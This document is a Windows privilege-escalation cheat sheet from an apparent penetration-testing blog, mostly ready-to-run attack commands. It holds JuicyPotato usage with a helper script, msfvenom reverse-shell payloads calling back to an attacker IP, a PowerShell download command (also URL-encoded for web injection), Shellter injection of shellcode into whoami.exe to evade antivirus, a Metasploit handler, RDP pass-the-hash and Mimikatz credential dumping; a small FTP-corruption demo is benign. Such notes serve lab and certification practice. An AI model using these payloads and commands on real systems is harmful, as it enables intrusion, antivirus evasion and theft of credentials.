Maojui

Attacking Servers (5) | Privilege Escalation - Windows

2022-08-05

Juicy Potato (abusing the golden privileges)

Process creation mode: depending on the impersonated user's privileges you can choose from:

  • CreateProcessWithToken (needs SeImpersonate)
  • CreateProcessAsUser (needs SeAssignPrimaryToken)
  • both

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from Windows Service Accounts to NT AUTHORITY\SYSTEM. Check whoami /priv first: JuicyPotato applies when the current token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. A privilege shown as Disabled is still present in the token and can be enabled by the process, so it counts; this is the usual situation for IIS and MSSQL service accounts.
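Deciding which -t mode to pass is the step people skip; the script below is an added example (not code from the original page or from the JuicyPotato project) that parses `whoami /priv` output and maps the held privileges to JuicyPotato's -t values as given in the tool's own usage text (-t t = CreateProcessWithTokenW, -t u = CreateProcessAsUser, -t * = try both). The whoami output embedded in it is a constructed sample resembling an IIS application-pool account, and the program path, listen port and CLSID are caller-supplied.

```python
"""Pick the JuicyPotato -t mode from `whoami /priv` output.

Added example, not code from the original page or from the JuicyPotato
project.  SAMPLE_WHOAMI_PRIV is constructed to resemble what an IIS
application-pool account shows; the -t mapping follows JuicyPotato's usage
text (-t t = CreateProcessWithTokenW, -t u = CreateProcessAsUser,
-t * = try both).
"""
import re

# Constructed sample of `whoami /priv`, as captured from a service-account shell.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_ROW = re.compile(r"^(Se[A-Za-z]+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_privileges(text):
    """Return {privilege_name: 'Enabled'|'Disabled'} for every privilege row."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def juicy_potato_mode(privs):
    """Map the token's privileges to a JuicyPotato -t value, or None.

    A privilege listed as Disabled still counts: it is present in the token
    and a process can enable its own held privileges.
    """
    impersonate = "SeImpersonatePrivilege" in privs
    assign_primary = "SeAssignPrimaryTokenPrivilege" in privs
    if impersonate and assign_primary:
        return "*"   # -t *: try CreateProcessWithTokenW, then CreateProcessAsUser
    if impersonate:
        return "t"   # -t t: CreateProcessWithTokenW
    if assign_primary:
        return "u"   # -t u: CreateProcessAsUser
    return None      # neither privilege: JuicyPotato will not help here


def juicy_potato_command(privs, program, listen_port, clsid, exe="juicypotato-x86.exe"):
    """Build the command line, or None when the token lacks both privileges.

    program, listen_port and clsid are caller-supplied (assumptions, not
    values from the page); the CLSID must be valid for the target's Windows
    version.
    """
    mode = juicy_potato_mode(privs)
    if mode is None:
        return None
    return f'{exe} -t {mode} -p {program} -l {listen_port} -c "{clsid}"'


if __name__ == "__main__":
    held = parse_privileges(SAMPLE_WHOAMI_PRIV)
    print(juicy_potato_command(held, r"C:\inetpub\wwwroot\shell.exe", 1338,
                               "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"))
```

Paste the real `whoami /priv` output from the target into SAMPLE_WHOAMI_PRIV (or read it from a file) and the script answers both questions at once: whether JuicyPotato is worth trying, and which -t to give it.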

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

CLSID

Windows CLSID

JuicyPotato

juicypotato-x86.exe -t * -p C:\inetpub\wwwroot\shell.exe -l 1338 -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"

-t * tries CreateProcessWithTokenW and then CreateProcessAsUser; -p is the program to launch as SYSTEM; -l is the local port the COM server listens on; -c is the CLSID, which must be one that exists on the target's Windows version (pick it from the CLSID list above).

RoguePotato

https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html

FTP

  • "This program cannot be run in DOS mode" after uploading an .exe means the file was transferred in ASCII mode and its bytes were rewritten. Switch to binary mode before transferring executables, and compare a hash on both ends if in doubt.

    ftp> binary
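The corruption behind that error is line-ending translation. The script below is an added example (not from the original page) that models an ASCII-mode transfer on a constructed stand-in for an executable, shows that the file still starts with MZ even though its size and hash changed, and performs the hash comparison that actually proves a transfer was intact. The byte string is constructed, not a real binary.

```python
"""Why `ftp> binary` matters: model ASCII-mode line-ending translation on an
executable and verify a transfer with a hash.

Added example, not code from the original page.  CONSTRUCTED_EXE is a
stand-in for a real .exe: the MZ magic, the familiar DOS-stub message and a
few raw bytes that contain LF (0x0A), the byte ASCII mode rewrites.
"""
import hashlib

# Constructed stand-in for an executable.  Real PE files are full of 0x0A
# bytes in code and data, so the same damage happens to any of them.
CONSTRUCTED_EXE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"This program cannot be run in DOS mode.\r\r\n$\x00"
    b"\x0a\x0d\x0a\x00\x0a\x41\x0a"
)


def ascii_mode_transfer(data):
    """Model of an FTP ASCII-mode transfer towards a Windows client: each bare
    LF is rewritten to CRLF.  Servers differ in the details (some also strip
    the high bit), but any rewrite at all breaks a binary file."""
    out = bytearray()
    prev = None
    for b in data:
        if b == 0x0A and prev != 0x0D:
            out += b"\r\n"
        else:
            out.append(b)
        prev = b
    return bytes(out)


def binary_mode_transfer(data):
    """Binary (image) mode: the bytes pass through unchanged."""
    return bytes(data)


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def transfer_is_intact(original, received):
    """The check worth doing on both ends: sha256sum on the attacker box,
    `certutil -hashfile <file> SHA256` on the Windows side, then compare."""
    return sha256_hex(original) == sha256_hex(received)


def starts_with_mz(data):
    """Only the magic.  It passes even for a corrupted file, so it is not a
    substitute for the hash comparison."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    ascii_copy = ascii_mode_transfer(CONSTRUCTED_EXE)
    print("binary intact:", transfer_is_intact(CONSTRUCTED_EXE, binary_mode_transfer(CONSTRUCTED_EXE)))
    print("ascii intact: ", transfer_is_intact(CONSTRUCTED_EXE, ascii_copy),
          "(size", len(CONSTRUCTED_EXE), "->", len(ascii_copy), ")")
```

The size grows by one byte per bare LF, every internal offset in the PE (including e_lfanew) now points at the wrong place, and the loader falls back to running the DOS stub, which is exactly the message seen on the page.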

Reverse shell

  • msfvenom: the first two payloads are staged (meterpreter, shell/reverse_tcp) and need a Metasploit multi/handler to deliver the second stage; windows/shell_reverse_tcp is stageless and can be caught with a plain nc listener

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
    msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe

Download by powershell

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.126:9999/mao.exe', 'c:\Users\Public\mao.exe')

#URL-ENCODE (the same command, encoded for use in a web request parameter)
powershell.exe%20%28New-Object%20System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2F192.168.119.126%3A9999%2Fmao.exe%27%2C%20%27c%3A%5CUsers%5CPublic%5Cmao.exe%27%29

RDP

Default port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

  • With credentials

    rdesktop -u <username> <IP>
    rdesktop -d <domain> -u <username> -p <password> <IP>
    xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
    xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>

    Pass-the-hash over RDP (/pth) only works when the target has Restricted Admin mode enabled; otherwise the logon fails and you need the plaintext password.

Windows script

msfvenom reverse shell payload (raw shellcode, for injection into a PE)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw > reverse_shell.bin

  • shellter: inject the raw payload into a PE file to evade antivirus (this payload calls back on port 80)

    sudo shellter

    • Inject reverse_shell.bin into whoami.exe

    cp /usr/share/windows-resources/binaries/whoami.exe .

    • Wherever you have write access on the target, drop the backdoored binary there and run it.
  • Catch the reverse shell

sudo msfconsole -q -x "use exploit/multi/handler;\
set PAYLOAD windows/meterpreter/reverse_tcp;\
set LHOST 192.168.119.126;\
set LPORT 8888;\
run"

    The handler's PAYLOAD, LHOST and LPORT must match what msfvenom was given. The payload above was built with LPORT=80, so either set LPORT 80 here or rebuild the payload with LPORT=8888; a mismatched port is the most common reason the shell never arrives.

  • Change poultryadmin's password to OffSecHax1!

net user <user_name> <password>

Mimikatz

  • Enable SeDebugPrivilege first (required to read LSASS; run it before the sekurlsa commands)

    privilege::debug
  • Show stored credentials (Credential Manager vault)

    vault::cred
  • Dump credentials (lsadump::sam reads the SAM hive and additionally needs SYSTEM, e.g. via token::elevate)

    sekurlsa::msv
    sekurlsa::logonPasswords
    lsadump::sam

Privesc check